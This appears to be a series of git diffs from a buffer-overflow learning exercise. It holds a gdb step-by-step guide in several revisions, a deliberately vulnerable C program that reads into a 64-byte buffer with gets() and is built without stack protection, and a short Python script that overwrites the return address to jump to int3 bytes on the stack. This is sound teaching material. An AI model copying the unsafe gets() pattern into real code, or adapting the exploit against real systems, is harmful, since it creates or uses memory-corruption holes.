+#### Disassemble the main function to find the ret(32)/retq(64 aka return quad) instruction
 ```
 (gdb) disassemble main
 ```
 
-### Create a break point when the main function returns
+#### Create a break point when the main function returns
 ```
 (gdb) break *0x0...
 ```
 
-### Define a hook-stop macro
+#### Define a hook-stop macro
 ```
 (gdb) define hook-stop
 ```
-### Setup the hook
+#### Setup the hook
 ```
 # Display the current instruction which will be executed next $eip (32) / $rip (64)
 > x/1i $eip 
@@ -41,53 +41,53 @@ $ gdb stack
 > end
 ```
 
-### Execute it
+#### Execute it
 ```
 (gdb) r
 ```
 
-### The code should break at out breakpoint so let's step into the return
+#### The code should break at out breakpoint so let's step into the return
 ```
 (gdb) si
 ```
 
-### Run the code with the alphabet
+#### Run the code with the alphabet
 ```
 (gdb) r < alphabet
 ```
 
-### Step into what should be a segmentation fault
+#### Step into what should be a segmentation fault
 ```
 (gdb) si
 ```
 
-### Inspect the stack register $esp(32)/$rsp(64)
+#### Inspect the stack register $esp(32)/$rsp(64)
 ```
 (gdb) x/s $esp
 (gdb) x/s $rsp
 ```
 
-### Run it again
+#### Run it again
 ```
 (gdb) r
 ```
 
-### Step into our return
+#### Step into our return
 ```
 (gdb) si
 ```
 
-### Inspect the registers
+#### Inspect the registers
 ```
 (gdb) info registers
 ```
 
-### Update the script with a INT3 and then run
+#### Update the script with a INT3 and then run
 ```
 (gdb) r < exploit
 ```
 
-### Continue the code which should show us telling the instructor to jump to the stack, hitting an int3 and if all worked you will have a SIGTRAP instead of a SIGSEGV
+#### Continue the code which should show us telling the instructor to jump to the stack, hitting an int3 and if all worked you will have a SIGTRAP instead of a SIGSEGV
 ```
 (gdb) c
 ```
diff --git a/stack.c b/stack.c
@@ -3,7 +3,7 @@
 #include <stdio.h>
 #include <string.h>
 
-int main(int argc, char ** argv) {
+int main() {
     char buffer[64];
     gets(buffer);
     return 0;

diff --git a/PROCESS.MD b/PROCESS.MD
@@ -1,5 +1,7 @@
 # PROCESS
 
+### GDB Documentation:
+
 * https://sourceware.org/gdb/onlinedocs/gdb/
 * http://visualgdb.com/gdbreference/commands/x
 
@@ -39,22 +41,22 @@ $ gdb stack
 > end
 ```
 
-# Execute it
+### Execute it
 ```
 (gdb) r
 ```
 
-# The code should break at out breakpoint so let's step into the return
+### The code should break at out breakpoint so let's step into the return
 ```
 (gdb) si
 ```
 
-# Run the code with the alphabet
+### Run the code with the alphabet
 ```
 (gdb) r < alphabet
 ```
 
-# Step into what should be a segmentation fault
+### Step into what should be a segmentation fault
 ```
 (gdb) si
 ```

diff --git a/PROCESS.MD b/PROCESS.MD
@@ -1,36 +1,53 @@
-# https://sourceware.org/gdb/onlinedocs/gdb/
-# http://visualgdb.com/gdbreference/commands/x
+# PROCESS
 
-# Build binary
+* https://sourceware.org/gdb/onlinedocs/gdb/
+* http://visualgdb.com/gdbreference/commands/x
+
+### Build binary
+```
 $ gcc stack.c -fno-stack-protector -o stack
+```
 
-# Run GDB
+### Run GDB
+```
 $ gdb stack
+```
 
-# Disassemble the main function to find the ret(32)/retq(64 aka return quad) instruction
+### Disassemble the main function to find the ret(32)/retq(64 aka return quad) instruction
+```
 (gdb) disassemble main
+```
 
-# Create a break point when the main function returns
+### Create a break point when the main function returns
+```
 (gdb) break *0x0...
+```
 
-# Define a hook-stop macro
+### Define a hook-stop macro
+```
 (gdb) define hook-stop
-# Display the current instruction which will be executed next
-# $eip (32) / $rip (64)
+```
+### Setup the hook
+```
+# Display the current instruction which will be executed next $eip (32) / $rip (64)
 > x/1i $eip 
 > x/1i $rip
-# Examine 8 words as hex from the stack
-# $esp (32) / $rsp (64) and x/8wx (32) / x8gx (64)
+# Examine 8 words as hex from the stack $esp(32)/$rsp(64) and x/8wx(32)/x8gx(64)
 > x/8wx $esp
 > x/8gx $rsp
 # Close the hook stop
 > end
+```
 
 # Execute it
+```
 (gdb) r
+```
 
 # The code should break at out breakpoint so let's step into the return
+```
 (gdb) si
+```
 
 # Run the code with the alphabet
 ```
@@ -42,20 +59,33 @@ $ gdb stack
 (gdb) si
 ```
 
-# Inspect the stack register $esp(32)/$rsp(64)
+### Inspect the stack register $esp(32)/$rsp(64)
+```
 (gdb) x/s $esp
 (gdb) x/s $rsp
+```
 
-# Run it again
+### Run it again
+```
 (gdb) r
-# Step into our return
+```
+
+### Step into our return
+```
 (gdb) si
-# Inspect the registers
+```
+
+### Inspect the registers
+```
 (gdb) info registers
+```
 
-# Update the script with a INT3 and then run
+### Update the script with a INT3 and then run
+```
 (gdb) r < exploit
+```
 
-# Continue the code which should show us telling the instructor to jump to the stack, hitting an int3
-# and if all worked you will have a SIGTRAP instead of a SIGSEGV
+### Continue the code which should show us telling the instructor to jump to the stack, hitting an int3 and if all worked you will have a SIGTRAP instead of a SIGSEGV
+```
 (gdb) c
+```
diff --git a/PROCESS.MD b/PROCESS.MD
@@ -0,0 +1,61 @@
+# https://sourceware.org/gdb/onlinedocs/gdb/
+# http://visualgdb.com/gdbreference/commands/x
+
+# Build binary
+$ gcc stack.c -fno-stack-protector -o stack
+
+# Run GDB
+$ gdb stack
+
+# Disassemble the main function to find the ret(32)/retq(64 aka return quad) instruction
+(gdb) disassemble main
+
+# Create a break point when the main function returns
+(gdb) break *0x0...
+
+# Define a hook-stop macro
+(gdb) define hook-stop
+# Display the current instruction which will be executed next
+# $eip (32) / $rip (64)
+> x/1i $eip 
+> x/1i $rip
+# Examine 8 words as hex from the stack
+# $esp (32) / $rsp (64) and x/8wx (32) / x8gx (64)
+> x/8wx $esp
+> x/8gx $rsp
+# Close the hook stop
+> end
+
+# Execute it
+(gdb) r
+
+# The code should break at out breakpoint so let's step into the return
+(gdb) si
+
+# Run the code with the alphabet
+```
+(gdb) r < alphabet
+```
+
+# Step into what should be a segmentation fault
+```
+(gdb) si
+```
+
+# Inspect the stack register $esp(32)/$rsp(64)
+(gdb) x/s $esp
+(gdb) x/s $rsp
+
+# Run it again
+(gdb) r
+# Step into our return
+(gdb) si
+# Inspect the registers
+(gdb) info registers
+
+# Update the script with a INT3 and then run
+(gdb) r < exploit
+
+# Continue the code which should show us telling the instructor to jump to the stack, hitting an int3
+# and if all worked you will have a SIGTRAP instead of a SIGSEGV
+(gdb) c
diff --git a/explot.py b/explot.py
@@ -0,0 +1,16 @@
+import struct
+
+# This is for a 64 bit architecture
+
+# 64 bytes for the character string plus 8 bytes for the LEAVE (or ENTER) instruction
+# this should take us to the RETURN instruction
+padding = "\x01"*72
+
+# Point the EIP at the stack
+eip = struct.pack("Q", 0x7fffffffde00)
+
+# Trip the code into a CPU debugger (also known as int3),
+# prevents a segmentation fault from halting the application
+payload = "\xCC"*8
+
+print padding + eip + payload
diff --git a/stack.c b/stack.c
@@ -0,0 +1,10 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+
+int main(int argc, char ** argv) {
+    char buffer[64];
+    gets(buffer);
+    return 0;
+}